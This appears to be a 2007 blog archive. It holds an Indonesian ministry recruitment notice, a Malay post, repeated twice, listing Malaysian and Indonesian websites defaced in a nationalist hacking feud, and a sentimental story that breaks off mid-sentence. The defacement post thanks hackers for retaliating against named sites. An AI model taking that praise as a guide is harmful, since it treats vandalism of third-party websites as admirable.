DEPARTEMEN TENAGA KERJA DAN TRANSMIGRASI
REPUBLIK INDONESIA
PENGUMUMAN
Nomor : PENG.04/SJ-OKP/IX/2007
Tentang
PENERIMAAN CALON PEGAWAI NEGERI SIPIL
DEPARTEMEN TENAGA KERJA DAN TRANSMIGRASI
TINGKAT SARJANA (GOLONGAN III) DAN DIPLOMA TIGA (GOLONGAN II)
TAHUN 2007
Berdasarkan Keputusan Menteri Pendayagunaan Aparatur Negara Nomor B/2147/M.PAN/9/2007 tentang Persetujuan Prinsip Tambahan Formasi PNS Tahun 2007 dan Peraturan Kepala Badan Kepegawaian Negara Nomor 30 Tahun 2007 tentang Pedoman Pelaksanaan Pengadaan Calon Pegawai Negeri Sipil, diumumkan sebagai berikut :
1. Departemen Tenaga Kerja dan Transmigrasi membuka pendaftaran Calon Pegawai Negeri Sipil untuk mengisi lowongan formasi Depnakertrans tahun 2007 untuk ditempatkan pada Kantor Pusat dan Unit Pelaksana Teknis (UPT) di seluruh Indonesia.
2. Kualifikasi pendidikan yang dibutuhkan :
untuk semua jurusan bukan Sarjana Pendidikan (S.Pd).
3. Persyaratan meliputi :
a. Warga Negara Republik Indonesia;
b. Usia paling rendah 18 (delapan belas) tahun dan paling tinggi 35 (tiga puluh lima) tahun pada 1 Oktober 2007;
c. Tingkat pendidikan :
1). Sarjana (S1) berakreditasi dengan IPK ? 2,75;
2). Diploma Tiga (D3) berakreditasi dengan IPK ? 2,75.
d. Tidak pernah dihukum penjara atau kurungan berdasarkan putusan pengadilan yang sudah mempunyai kekuatan hukum yang tetap, karena melakukan suatu tindak pidana kejahatan;
e. Tidak berstatus sebagai Calon Pegawai Negeri Sipil/Pegawai Negeri Sipil;
f. Tidak pernah diberhentikan dengan hormat tidak atas permintaan sendiri atau tidak dengan hormat sebagai PNS atau diberhentikan tidak dengan hormat sebagai pegawai swasta;
g. Mempunyai pendidikan, kecakapan, keahlian dan keterampilan yang diperlukan;
h. Berkelakuan baik dan sehat jasmani maupun rohani;
i. Tidak menjadi anggota dan atau pengurus partai politik;
j. Bersedia ditempatkan di seluruh wilayah Negara Kesatuan Republik Indonesia;
k. Waktu melamar telah memiliki ijazah perguruan tinggi negeri atau perguruan tinggi swasta yang telah terakreditasi. Apabila dalam ijazah tersebut tidak disebutkan akreditasi, maka perlu dilampirkan surat keterangan dari universitas yang bersangkutan yang menyebutkan akreditasinya;
l. Berbahasa Inggris TOEFL = 450/IELTS=5 (diutamakan);
m. Berpengalaman kerja (diutamakan).
4. Ketentuan Pendaftaran :
a. Penerimaan surat lamaran :
1). Panitia menerima berkas lamaran melalui pos tercatat mulai tanggal 18 s.d. 25 September 2007 (cap pos) dan sudah diterima Panitia selambat-lambatnya tanggal 28 September 2007;
2). Panitia tidak menerima surat lamaran yang diantar langsung;
3). Surat lamaran harus ditulis tangan dan ditandatangani sendiri oleh pelamar dengan menggunakan tinta hitam, ditujukan kepada : Ketua Tim Pengadaan PNS Depnakertrans Tahun Anggaran 2007;
4). Pelamar memilih jabatan dan 3 (tiga) alternatif daerah penempatan yang diinginkan sesuai dengan pendidikan yang dimiliki, misal : jabatan Instruktur, pendidikan Teknik Elektro, daerah penempatan (1) Bekasi, (2) Medan, dan (3) Ternate;
- 3 -
5). Berkas lamaran dimasukkan dalam amplop coklat dan dikirim melalui pos, kepada :
KETUA TIM PENGADAAN PEGAWAI NEGERI SIPIL TAHUN 2007
DEPARTEMEN TENAGA KERJA DAN TRANSMIGRASI RI
PO BOX 4049 JKTM 12700
6). Surat lamaran yang dikirim selain alamat diatas, tidak akan diproses.
b. Surat lamaran dilengkapi dengan :
1). Formulir pendaftaran dan surat pernyataan (dapat didownload melalui situs internet resmi Depnakertrans www.nakertrans.go.id);
2). Pas photo terakhir ukuran 4 x 6 cm sebanyak 3 (tiga) lembar dan ditulis nama pelamar di bagian belakang photo;
3). Foto copy ijazah dan transkrip nilai yang telah dilegalisir oleh Rektor/Dekan/Pembantu Dekan Bidang Akademik bagi Universitas/Institut, atau Ketua/Pembantu Ketua Bidang Akademik bagi Sekolah Tinggi, dengan menyebutkan pejabatnya (cap basah);
4). Foto copy Kartu Tanda Penduduk (KTP) yang masih berlaku;
5). Foto copy Kartu tanda pencari kerja (Kartu Kuning/AK.1) dari Dinas yang menangani bidang Ketenagakerjaan yang masih berlaku dan dilegalisir;
6). Asli atau foto copy Surat Keterangan Sehat dari rumah sakit atau dokter satu bulan terakhir yang dilegalisir;
7). Asli atau foto copy Surat Keterangan Catatan Kepolisian yang masih berlaku dan dilegalisir;
8). Foto copy hasil nilai TOEFL/IELTS (bila ada) yang dilegalisir;
9). Sertifikat kursus komputer/keterampilan/pengalaman kerja yang dilegalisir pejabat yang berwenang (bila ada);
10). Amplop surat ukuran 23 x 11 cm sebanyak 2 (dua) lembar yang masing-masing ditulisi alamat pelamar dan ditempel perangko secukupnya.
c. Surat lamaran, formulir pendaftaran dan surat pernyataan beserta berkas lampiran disusun rapi sesuai urutan diatas (point 4.b) dalam map kertas jepit berlubang dengan warna :
1). MERAH untuk Sarjana (S1);
2). KUNING untuk Diploma Tiga (D3).
5. Pelaksanaan seleksi :
a. Seleksi administratif (point 3 dan 4) dilakukan dengan sistem gugur.
b. Jenis materi ujian terdiri dari :
1). Tes Kompetensi Dasar (TKD) terdiri dari :
a). Tes Pengetahuan Umum (TPU) meliputi unsur wawasan nasional, regional dan internasional;
b). Tes Bakat Skolastik (TBS) meliputi unsur kemampuan : verbal, kuantitatif, dan penalaran;
c). Tes Skala Kematangan (TSK) meliputi unsur kemampuan beradaptasi, pengendalian diri, semangat berprestasi, integritas, dan inisiatif.
2). Tes Kompetensi Bakat (TKB) untuk mengukur kemampuan dan atau keterampilan yang berkaitan dengan kompetensi jabatan atau pekerjaan yang dilamar.
6. Lain-lain :
a. Hanya pelamar yang memenuhi seluruh ketentuan (point 3 dan 4) yang akan dipanggil untuk mengikuti ujian;
b. Tanda peserta ujian, waktu dan lokasi seleksi akan diumumkan kemudian melalui situs internet diatas serta akan dikirim melalui surat ke alamat pelamar.
c. Panitia tidak bertanggung jawab atas keterlambatan surat yang dikirim ke alamat pelamar.
d. Apabila jumlah peserta yang memenuhi ketentuan melebihi jumlah peserta ujian yang ditentukan, Panitia memberlakukan sistem ranking berdasarkan nilai Indeks Prestasi Kumulatif (IPK) dan kompetensi lainnya sesuai dengan kebutuhan jabatan;
- 4 -
e. Biaya yang timbul dalam pelaksanaan ujian penyaringan ini dibebankan pada APBN;
f. Seleksi penerimaan calon pegawai negeri sipil Depnakertrans tidak dipungut biaya apapun;
g. Berkas pelamar yang memenuhi syarat menjadi arsip Departemen Tenaga Kerja dan Transmigrasi dan tidak dapat diminta kembali oleh pelamar;
h. Bagi yang telah mengirim lamaran sebelum pengumuman ini dibuat, tidak berlaku;
i. Peserta yang dinyatakan lulus menjadi CPNS wajib menyerahkan surat keterangan bebas narkoba dari dokter dan menunjukkan ijazah asli pendidikan terakhir kepada Panitia pada waktu penyerahan berkas;
j. Panitia berhak menempatkan pelamar sesuai dengan kompetensinya di luar daerah pilihan pelamar;
k. Keputusan Tim Pengadaan PNS Depnakertrans Tahun Anggaran 2007 bersifat mutlak dan tidak dapat diganggu gugat;
l. Informasi resmi yang terkait dengan seleksi CPNS Depnakertrans tahun 2007 dapat dilihat dalam situs internet resmi Depnakertrans www.nakertrans.go.id. Para pelamar disarankan untuk aktif memantaunya.
Jakarta, 17 September 2007
Kepala Biro Organisasi dan Kepegawaian
Selaku
Ketua Tim Pengadaan PNS Depnakertrans
Tahun Anggaran 2007
ttd
H. A. Aziz Rifa’i M., SH, MM
NIP. 160025339
21 September 2007
Rame Neeh
LAMAN WEB MALAYSIA DI'HACK'
Godam Indon
Dalam minggu nie seluruh warga cyber telah dikejutkan oleh kehadiran
sekumpulan hackers dari pelbagai pelusuk indonesia yang telah
melancarkan gerakan "Ganyang Malaysia" , sama seperti gerakan "Ganyang
Malaysia " yang dipelopori oleh Presiden Sukarno semasa konfrantasi
diantara Malaysia dan Indonesia di dalam usaha Presiden Sukarno hendak
menubuhkan Indonesia Raya.
Isu Gerakan Ganyang Malaysia ini muncul kembali kerana tidak puas hati
dengan tindakan kerajaan Malaysia mengenai isu PATI(Pendatang Asing
Tanpa Izin) dan mengenai Pulau Ambalat , dimana kerajaan Malaysia
telah memberi konsensi mencari gali minyak di Pulau Ambalat kepada
syarikat Shell. Indonesia membantah tindakan Malaysia kerana Indonesia
mendakwa Kepulauan Ambalat milik Indonesia. Media Massa Indonesia yang
memainkan sentimen Gerakan Ganyang Malaysia sehingga mengundang
sekumpulan ` hackers' untuk melancarkan Gerakan Ganyang Malaysia nie
menerusi cyber.
Gerakan mendeface web-web kerajaan , universiti dan web perseorangan
begitu teliti dan msg yang di tulis di muka hadapan adalah beitu
jelek.Gerakan ini begitu terancang dan dianngotai oleh pelbagai group
hacker di Indonesia seperti group Medan Hacker yang mempunyai channel
IRC di server Dalnet. Kumpulan ini telah banyak mendeface web-web
Malaysia..lebih kurang 22 web telah kena deface seperti yang
disenaraikan di bawah.
1. Universiti Sains Malaysia (2x)
2. Malaysian Communications and Multimedia Commission
3. Suhakam
4. Ministry of Energy, Water and Communications
5. Jabatan Kerja Raya (2x)
6. Royal Malaysian Customs
7. KLpages.com (by Telekom Malaysia)
8. mobile2u.com.my
9. Sultan of Perak
10. Perak Museum
11. XPTranslation's BBS (A Malaysian translation company)
12. Jabatan Perkhidmatan Penerangan Malaysia, Perak
13. Perak Veterinary Department
14. Multimedia University
15. National Productivity Council
16. United Nations Development Programmes in Malaysia
17. Malaysian Amateur Radio Emergency Services Society
18. Islamic Information & Services Foundation (IIS) (Same
vulnerability as my old guestbook)..
19. Japan Club KL forum
20. Terra-Lingua(Austrian site but filled with hate-Malaysia text,
supposedly for the Ambalat case.)
21. TourMalaysia Travel Agency
22. Era Edar Marketing Sdn Bhd (Google cache of the hacked page)
Persoalannya dimana Hackers Malaysia yang lain, dimana sebelum ini
sungguh aktif mendeface web-web di Malaysia. Mujur la ada seelintir
Hackers di Malaysia telah melancarkan kembali serangan kepada web-web
di Indonesia..Dan pagi ini saya telah mendapat msg daripada kawan saya
dan memberitahu list terbaru yang web-web Indonesia yang telah di
deface oleh Symphoenix.ClanZ. Terima Kasih kerana telah menyahut
seruan "Gerakan Godam Indonesia ". Di bawah nie list web-web indonesia
yang telah digodam oleh Symphoenix.ClanZ
http://webserver.sby.rad.net.id/
http://www.surya.co.id/
http://www.indoturtle.web.id/
http://www.cta.co.id/
http://dev.surya.co.id/
http://www.gafeksi.or.id/
http://www.surabaya-noor.com/
http://www.sby.rad.net.id/
http://www.bumipalapa.co.id/
http://www.apbmi-sby.or.id/
http://www.dinamikacargo.co.id/
http://www.contiforma.co.id/
http://www.fourthr.co.id/
http://www.gapeknasjatim.or.id/
http://www.gigafm.co.id/
http://www.ginsi-jatim.or.id/
http://www.ibmt.ac.id/
http://www.iglas.co.id/
http://www.imcsby.or.id/
http://www.itps-sby.ac.id/
http://www.laban-raya.co.id/
http://www.mesran.co.id/
http://www.metrofm.co.id/
http://www.wijayafm.co.id/
http://www.ptbbi.co.id/
http://www.stieprimavisi.ac.id/
http://www.pt-gcs.co.id/
http://www.stiep.ac.id/
http://www.tulungagung.go.id/
http://www.ometracoaryasamanta.co.id/
http://www.st-louis1-sby.sch.id/
http://kpu.surabaya.go.id/
Godam Indon
Dalam minggu nie seluruh warga cyber telah dikejutkan oleh kehadiran
sekumpulan hackers dari pelbagai pelusuk indonesia yang telah
melancarkan gerakan "Ganyang Malaysia" , sama seperti gerakan "Ganyang
Malaysia " yang dipelopori oleh Presiden Sukarno semasa konfrantasi
diantara Malaysia dan Indonesia di dalam usaha Presiden Sukarno hendak
menubuhkan Indonesia Raya.
Isu Gerakan Ganyang Malaysia ini muncul kembali kerana tidak puas hati
dengan tindakan kerajaan Malaysia mengenai isu PATI(Pendatang Asing
Tanpa Izin) dan mengenai Pulau Ambalat , dimana kerajaan Malaysia
telah memberi konsensi mencari gali minyak di Pulau Ambalat kepada
syarikat Shell. Indonesia membantah tindakan Malaysia kerana Indonesia
mendakwa Kepulauan Ambalat milik Indonesia. Media Massa Indonesia yang
memainkan sentimen Gerakan Ganyang Malaysia sehingga mengundang
sekumpulan ` hackers' untuk melancarkan Gerakan Ganyang Malaysia nie
menerusi cyber.
Gerakan mendeface web-web kerajaan , universiti dan web perseorangan
begitu teliti dan msg yang di tulis di muka hadapan adalah beitu
jelek.Gerakan ini begitu terancang dan dianngotai oleh pelbagai group
hacker di Indonesia seperti group Medan Hacker yang mempunyai channel
IRC di server Dalnet. Kumpulan ini telah banyak mendeface web-web
Malaysia..lebih kurang 22 web telah kena deface seperti yang
disenaraikan di bawah.
1. Universiti Sains Malaysia (2x)
2. Malaysian Communications and Multimedia Commission
3. Suhakam
4. Ministry of Energy, Water and Communications
5. Jabatan Kerja Raya (2x)
6. Royal Malaysian Customs
7. KLpages.com (by Telekom Malaysia)
8. mobile2u.com.my
9. Sultan of Perak
10. Perak Museum
11. XPTranslation's BBS (A Malaysian translation company)
12. Jabatan Perkhidmatan Penerangan Malaysia, Perak
13. Perak Veterinary Department
14. Multimedia University
15. National Productivity Council
16. United Nations Development Programmes in Malaysia
17. Malaysian Amateur Radio Emergency Services Society
18. Islamic Information & Services Foundation (IIS) (Same
vulnerability as my old guestbook)..
19. Japan Club KL forum
20. Terra-Lingua(Austrian site but filled with hate-Malaysia text,
supposedly for the Ambalat case.)
21. TourMalaysia Travel Agency
22. Era Edar Marketing Sdn Bhd (Google cache of the hacked page)
Persoalannya dimana Hackers Malaysia yang lain, dimana sebelum ini
sungguh aktif mendeface web-web di Malaysia. Mujur la ada seelintir
Hackers di Malaysia telah melancarkan kembali serangan kepada web-web
di Indonesia..Dan pagi ini saya telah mendapat msg daripada kawan saya
dan memberitahu list terbaru yang web-web Indonesia yang telah di
deface oleh Symphoenix.ClanZ. Terima Kasih kerana telah menyahut
seruan "Gerakan Godam Indonesia ". Di bawah nie list web-web indonesia
yang telah digodam oleh Symphoenix.ClanZ
http://webserver.sby.rad.net.id/
http://www.surya.co.id/
http://www.indoturtle.web.id/
http://www.cta.co.id/
http://dev.surya.co.id/
http://www.gafeksi.or.id/
http://www.surabaya-noor.com/
http://www.sby.rad.net.id/
http://www.bumipalapa.co.id/
http://www.apbmi-sby.or.id/
http://www.dinamikacargo.co.id/
http://www.contiforma.co.id/
http://www.fourthr.co.id/
http://www.gapeknasjatim.or.id/
http://www.gigafm.co.id/
http://www.ginsi-jatim.or.id/
http://www.ibmt.ac.id/
http://www.iglas.co.id/
http://www.imcsby.or.id/
http://www.itps-sby.ac.id/
http://www.laban-raya.co.id/
http://www.mesran.co.id/
http://www.metrofm.co.id/
http://www.wijayafm.co.id/
http://www.ptbbi.co.id/
http://www.stieprimavisi.ac.id/
http://www.pt-gcs.co.id/
http://www.stiep.ac.id/
http://www.tulungagung.go.id/
http://www.ometracoaryasamanta.co.id/
http://www.st-louis1-sby.sch.id/
http://kpu.surabaya.go.id/
12 September 2007
"Shi Sang Chi You Mama Hau"
"Ibu kita adalah Orang Yang Paling Mulia di dunia ini"
Alkisah, ada sepasang kekasih yang saling mencintai. Sang pria berasal
dari keluarga kaya, dan merupakan orang yang terpandang di kota
tersebut. Sedangkan sang wanita adalah seorang yatim piatu, hidup serba
kekurangan, tetapi cantik, lemah lembut, dan baik hati. Kelebihan inilah
yang membuat sang pria jatuh hati.
Sang wanita hamil di luar nikah. Sang pria lalu mengajaknya menikah,
dengan membawa sang wanita ke rumahnya. Seperti yang sudah mereka duga,
orang tua sang pria tidak menyukai wanita tsb. Sebagai orang yang
terpandang di kota tsb, latar belakang wanita tsb akan merusak reputasi
keluarga. Sebaliknya, mereka bahkan telah mencarikan jodoh yang sepadan
untuk anaknya. Sang pria berusaha menyakinkan orang tuanya, bahwa ia
sudah menetapkan keputusannya, apapun resikonya bagi dia.
Sang wanita merasa tak berdaya, tetapi sang pria menyakinkan wanita tsb
bahwa tidak ada yang bisa memisahkan mereka. Sang pria terus berargumen
dengan orang tuanya, bahkan membantah perkataan orangtuanya, sesuatu
yang belum pernah dilakukannya selama hidupnya (di zaman dulu, umumnya
seorang anak sangat tunduk pada orang tuanya).
Sebulan telah berlalu, sang pria gagal untuk membujuk orang tuanya agar
menerima calon istrinya. Sang orang tua juga stress karena gagal
membujuk anak satu-satunya, agar berpisah dengan wanita tsb, yang
menurut mereka akan sangat merugikan masa depannya.
Sang pria akhirnya menetapkan pilihan untuk kawin lari.
Ia memutuskan untuk meninggalkan semuanya demi sang kekasih. Waktu
keberangkatan pun ditetapkan, tetapi rupanya rencana ini diketahui oleh
orang tua sang pria. Maka ketika saatnya tiba, sang ortu mengunci
anaknya di dalam kamar dan dijaga ketat oleh para bawahan di rumahnya
yang besar.
Sebagai gantinya, kedua orang tua datang ke tempat yang telah
ditentukan sepasang kekasih tsb untuk melarikan diri. Sang wanita sangat
terkejut dengan kedatangan ayah dan ibu sang pria. Mereka kemudian
memohon pengertian dari sang wanita, agar meninggalkan anak mereka satu-
satunya.
Menurut mereka, dengan perbedaan status sosial yang sangat besar,
perkawinan mereka hanya akan menjadi gunjingan seluruh penduduk kota,
reputasi anaknya akan tercemar, orang2 tidak akan menghormatinya lagi.
Akibatnya, bisnis yang akan diwariskan kepada anak mereka akan bangkrut
secara perlahan2.
Mereka bahkan memberikan uang dalam jumlah banyak, dengan permohonan
agar wanita tsb meninggalkan kota ini, tidak bertemu dengan anaknya
lagi, dan menggugurkan kandungannya. Uang tsb dapat digunakan untuk
membiayai hidupnya di tempat lain.
Sang wanita menangis tersedu-sedu. Dalam hati kecilnya, ia sadar bahwa
perbedaan status sosial yang sangat jauh, akan menimbulkan banyak
kesulitan bagi kekasihnya. Akhirnya, ia setuju untuk meninggalkan kota
ini, tetapi menolak untuk menerima uang tsb. Ia mencintai sang pria,
bukan uangnya. Walaupun ia sepenuhnya sadar, jalan hidupnya ke depan
akan sangat sulit?.
Ibu sang pria kembali memohon kepada wanita tsb untuk meninggalkan
sepucuk surat kepada mereka, yang menyatakan bahwa ia memilih berpisah
dengan sang pria. Ibu sang pria kuatir anaknya akan terus mencari
kekasihnya, dan tidak mau meneruskan usaha orang tuanya. "Walaupun ia
kelak bukan suamimu, bukankah Anda ingin melihatnya sebagai seseorang
yang berhasil? Ini adalah untuk kebaikan kalian berdua", kata sang ibu.
Dengan berat hati, sang wanita menulis surat. Ia menjelaskan bahwa ia
sudah memutuskan untuk pergi meninggalkan sang pria. Ia sadar bahwa
keberadaannya hanya akan merugikan sang pria. Ia minta maaf karena
telah melanggar janji setia mereka berdua, bahwa mereka akan selalu
bersama
dalam menghadapi penolakan2 akibat perbedaan status sosial mereka. Ia
tidak kuat lagi menahan penderitaan ini, dan memutuskan untuk berpisah.
Tetesan air mata sang wanita tampak membasahi surat tersebut.
Sang wanita yang malang tsb tampak tidak punya pilihan lain.
Ia terjebak antara moral dan cintanya. Sang wanita segera meninggalkan
kota itu, sendirian. Ia menuju sebuah desa yang lebih terpencil. Disana,
ia
bertekad untuk melahirkan dan membesarkan anaknya.
==========000000000 0======== ======
Tiga tahun telah berlalu. Ternyata wanita tersebut telah menjadi
seorang ibu. Anaknya seorang laki2. Sang ibu bekerja keras siang dan
malam,
untuk membiayai kehidupan mereka. Di pagi dan siang hari, ia bekerja di
sebuah industri rumah tangga, malamnya, ia menyuci pakaian2 tetangga dan
menyulam sesuai dengan pesanan pelanggan. Kebanyakan ia melakukan semua
pekerjaan ini sambil menggendong anak di punggungnya. Walaupun ia cukup
berpendidikan, ia menyadari bahwa pekerjaan lain tidak memungkinkan,
karena ia harus berada di sisi anaknya setiap saat. Tetapi sang ibu
tidak pernah mengeluh dengan pekerjaannya?
Di usia tiga tahun, suatu saat, sang anak tiba2 sakit keras.
Demamnya sangat tinggi. Ia segera dibawa ke rumah sakit setempat. Anak
tsb harus menginap di rumah sakit selama beberapa hari. Biaya pengobatan
telah menguras habis seluruh tabungan dari hasil kerja kerasnya selama
ini, dan itupun belum cukup. Ibu tsb akhirnya juga meminjam ke
sana-sini, kepada siapapun yang bermurah hati untuk memberikan
pinjaman.
Saat diperbolehkan pulang, sang dokter menyarankan untuk membuat sup
ramuan, untuk mempercepat kesembuhan putranya. Ramuan tsb terdiri dari
obat2 herbal dan daging sapi untuk dikukus bersama. Tetapi sang ibu
hanya mampu membeli obat2 herbal tsb, ia tidak punya uang sepeserpun
lagi untuk membeli daging. Untuk meminjam lagi, rasanya tak mungkin,
karena ia telah berutang kepada semua orang yang ia kenal, dan belum
terbayar.
Ketika di rumah, sang ibu menangis. Ia tidak tahu harus berbuat apa,
untuk mendapatkan daging. Toko daging di desa tsb telah menolak
permintaannya, untuk bayar di akhir bulan saat gajian.
Diantara tangisannya, ia tiba2 mendapatkan ide. Ia mencari alkohol yang
ada di rumahnya, sebilah pisau dapur, dan sepotong kain.
Setelah pisau dapur dibersihkan dengan alkohol, sang ibu nekad
mengambil sekerat daging dari pahanya. Agar tidak membangunkan anaknya
yang sedang
tidur, ia mengikat mulutnya dengan sepotong kain. Darah berhamburan.
Sang ibu tengah berjuang mengambil dagingnya sendiri, sambil berusaha
tidak
mengeluarkan suara kesakitan yang teramat sangat?..
Hujan lebatpun turun. Lebatnya hujan menyebabkan rintihan kesakitan
sang ibu tidak terdengar oleh para tetangga, terutama oleh anaknya
sendiri.
Tampaknya langit juga tersentuh dengan pengorbanan yang sedang
dilakukan oleh sang ibu???.
==========000000000 0======== ======
Enam tahun telah berlalu, anaknya tumbuh menjadi seorang anak yang
tampan, cerdas, dan berbudi pekerti. Ia juga sangat sayang ibunya.
Di hari minggu, mereka sering pergi ke taman di desa tersebut, bermain
bersama, dan bersama2 menyanyikan lagu "Shi Sang Chi You Mama Hau"
(terjemahannya "Di Dunia ini, hanya ibu seorang yang baik").
Sang anak juga sudah sekolah. Sang ibu sekarang bekerja sebagai penjaga
toko, karena ia sudah bisa meninggalkan anaknya di siang hari.
Hari2 mereka lewatkan dengan kebersamaan, penuh kebahagiaan. Sang anak
terkadang memaksa ibunya, agar ia bisa membantu ibunya menyuci di malam
hari. Ia tahu ibunya masih menyuci di malam hari, karena perlu tambahan
biaya untuk sekolahnya. Ia memang seorang anak yang cerdas.
Ia juga tahu, bulan depan adalah hari ulang tahun ibunya.
Ia berniat membelikan sebuah jam tangan, yang sangat didambakan ibunya
selama ini. Ibunya pernah mencobanya di sebuah toko, tetapi segera
menolak setelah pemilik toko menyebutkan harganya. Jam tangan itu
sederhana, tidak terlalu mewah, tetapi bagi mereka, itu terlalu mahal.
Masih banyak keperluan lain yang perlu dibiayai.
Sang anak segera pergi ke toko tsb, yang tidak jauh dari rumahnya. Ia
meminta kepada kakek pemilik toko agar menyimpan jam tangan tsb, karena
ia akan membelinya bulan depan. "Apakah kamu punya uang?" tanya sang
pemilik toko. "Tidak sekarang, nanti saya akan punya", kata sang anak
dengan serius.
Ternyata, bulan depan sang anak benar2 muncul untuk membeli jam tangan
tsb. Sang kakek juga terkejut, kiranya sang anak hanya main2.
Ketika menyerahkan uangnya, sang kakek bertanya "Dari mana kamu
mendapatkan uang itu? Bukan mencuri kan?". "Saya tidak mencuri, kakek.
Hari ini
adalah hari ulang tahun ibuku. Saya biasanya naik becak pulang pergi ke
sekolah.
Selama sebulan ini, saya berjalan kaki saat pulang dari sekolah ke
rumah, uang jajan dan uang becaknya saya simpan untuk beli jam ini.
Kakiku sakit,
tapi ini semua untuk ibuku. O ya, jangan beritahu ibuku tentang hal
ini. Ia akan marah" kata sang anak. Sang pemilik toko tampak kagum pada
anak tsb.
Seperti biasanya, sang ibu pulang dari kerja di sore hari.
Sang anak segera memberikan ucapan selamat pada ibu, dan menyerahkan
jam tangan tsb. Sang ibu terkejut bercampur haru, ia bangga dengan
anaknya.
Jam tangan ini memang adalah impiannya. Tetapi sang ibu tiba2 tersadar,
dari mana uang untuk membeli jam tsb. Sang anak tutup mulut, tidak mau
menjawab.
"Apakah kamu mencuri, Nak?" Sang anak diam seribu bahasa, ia tidak
ingin ibu mengetahui bagaimana ia mengumpulkan uang tersebut.
Setelah ditanya berkali2 tanpa jawaban, sang ibu menyimpulkan bahwa
anaknya telah mencuri. "Walaupun kita miskin, kita tidak boleh mencuri.
Bukankah
ibu sudah mengajari kamu tentang hal ini?" kata sang ibu.
Lalu ibu mengambil rotan dan mulai memukul anaknya.
Biarpun ibu sayang pada anaknya, ia harus mendidik anaknya sejak kecil.
Sang anak menangis, sedangkan air mata sang ibu mengalir keluar. Hatinya
begitu
perih, karena ia sedang memukul belahan hatinya. Tetapi ia harus
melakukannya, demi kebaikan anaknya.
Suara tangisan sang anak terdengar keluar. Para tetangga menuju ke
rumah tsb heran, dan kemudian prihatin setelah mengetahui kejadiannya.
"Ia sebenarnya anak yang baik", kata salah satu tetangganya. Kebetulan
sekali, sang pemilik toko sedang berkunjung ke rumah salah satu
tetangganya yang merupakan familinya.
Ketika ia keluar melihat ke rumah itu, ia segera mengenal anak itu.
Ketika mengetahui persoalannya, ia segera menghampiri ibu itu untuk
menjelaskan. Tetapi tiba2 sang anak berlari ke arah pemilik toko,
memohon agar jangan menceritakan yang sebenarnya pada ibunya.
"Nak, ketahuilah, anak yang baik tidak boleh berbohong, dan tidak boleh
menyembunyikan sesuatu dari ibunya". Sang anak mengikuti nasehat kakek
itu. Maka kakek itu mulai menceritakan bagaimana sang anak tiba2 muncul
di tokonya sebulan yang lalu, memintanya untuk menyimpan jam
tangan tsb, dan sebulan kemudian akan membelinya. Anak itu muncul siang
tadi di tokonya, katanya hari ini adalah hari ulang tahun ibunya. Ia
juga
menceritakan bagaimana sang anak berjalan kaki dari sekolahnya pulang
ke rumah dan tidak jajan di sekolah selama sebulan ini, untuk
mengumpulkan
uang membeli jam tangan kesukaan ibunya.
Tampak sang kakek meneteskan air mata saat selesai menjelaskan hal tsb,
begitu pula dengan tetangganya. Sang ibu segera memeluk anak
kesayangannya, keduanya menangis dengan tersedu-sedu? ."Maafkan saya,
Nak."
"Tidak Bu, saya yang bersalah"??? ..
===========000= ========= =======
Sementara itu, ternyata ayah dari sang anak sudah menikah, tetapi
istrinya mandul. Mereka tidak punya anak. Sang ortu sangat sedih akan
hal ini, karena tidak akan ada yang mewarisi usaha mereka kelak.
Ketika sang ibu dan anaknya berjalan2 ke kota, dalam sebuah kesempatan,
mereka bertemu dengan sang ayah dan istrinya. Sang ayah baru menyadari
bahwa sebenarnya ia sudah punya anak dari darah dagingnya sendiri.
Ia mengajak mereka berkunjung ke rumahnya, bersedia menanggung semua
biaya hidup mereka, tetapi sang ibu menolak. Kami bisa hidup dengan baik
tanpa bantuanmu.
Berita ini segera diketahui oleh orang tua sang pria.
Mereka begitu ingin melihat cucunya, tetapi sang ibu tidak mau
mengizinkan.
===========000= ========= ========
Di pertengahan tahun, penyakit sang anak kembali kambuh.
Dokter mengatakan bahwa penyakit sang anak butuh operasi dan perawatan
yang konsisten. Kalau kambuh lagi, akan membahayakan jiwanya.
Keuangan sang ibu sudah agak membaik, dibandingkan sebelumnya. Tetapi
biaya medis tidaklah murah, ia tidak sanggup membiayainya.
Sang ibu kembali berpikir keras. Tetapi ia tidak menemukan solusi yang
tepat. Satu2nya jalan keluar adalah menyerahkan anaknya kepada sang
ayah, karena sang ayahlah yang mampu membiayai perawatannya.
Maka di hari Minggu ini, sang ibu kembali mengajak anaknya berkeliling
kota, bermain2 di taman kesukaan mereka. Mereka gembira sekali,
menyanyikan lagu "Shi Sang Chi You Mama Hau", lagu kesayangan mereka.
Untuk sejenak, sang ibu melupakan semua penderitaannya, ia hanyut dalam
kegembiraan bersama sang anak.
Sepulang ke rumah, ibu menjelaskan keadaannya pada sang anak.
Sang anak menolak untuk tinggal bersama ayahnya, karena ia hanya ingin
dengan ibu. "Tetapi ibu tidak mampu membiayai perawatan kamu, Nak"
kata ibu.
"Tidak apa2 Bu, saya tidak perlu dirawat. Saya sudah sehat, bila bisa
bersama2 dengan ibu. Bila sudah besar nanti, saya akan cari banyak uang
untuk biaya perawatan saya dan untuk ibu. Nanti, ibu tidak perlu
bekerja lagi, Bu", kata sang anak. Tetapi ibu memaksa akan berkunjung ke
rumah
sang ayah keesokan harinya. Penyakitnya memang bisa kambuh setiap saat.
Disana ia diperkenalkan dengan kakek dan neneknya.
Keduanya sangat senang melihat anak imut tersebut. Ketika ibunya hendak
pulang, sang anak meronta2 ingin ikut pulang dengan ibunya. Walaupun
diberikan
mainan kesukaan sang anak, yang tidak pernah ia peroleh saat bersama
ibunya, sang anak menolak. "Saya ingin Ibu, saya tidak mau mainan itu",
teriak
sang anak dengan nada yang polos. Dengan hati sedih dan menangis, sang
ibu berkata
"Nak, kamu harus dengar nasehat ibu. Tinggallah di sini. Ayah, kakek
dan nenek akan bermain bersamamu." "Tidak, aku tidak mau mereka. Saya
hanya
mau ibu, saya sayang ibu, bukankah ibu juga sayang saya? Ibu sekarang
tidak mau saya lagi", sang anak mulai menangis.
Bujukan demi bujukan ibunya untuk tinggal di rumah besar tsb tidak
didengarkan anak kecil tsb. Sang anak menangis tersedu2 "Kalau ibu
sayang padaku, bawalah saya pergi, Bu". Sampai pada akhirnya, ibunya
memaksa dengan mengatakan "Benar, ibu tidak sayang kamu lagi. Tinggallah
disini", ibunya segera lari keluar meninggalkan rumah tsb. Tampak
anaknya meronta2 dengan ledakan tangis yang memilukan.
Di rumah, sang ibu kembali meratapi nasibnya. Tangisannya begitu
menyayat hati, ia telah berpisah dengan anaknya. Ia tidak diperbolehkan
menjenguk anaknya, tetapi mereka berjanji akan merawat anaknya dengan
baik.
Diantara isak tangisnya, ia tidak menemukan arti hidup ini lagi. Ia
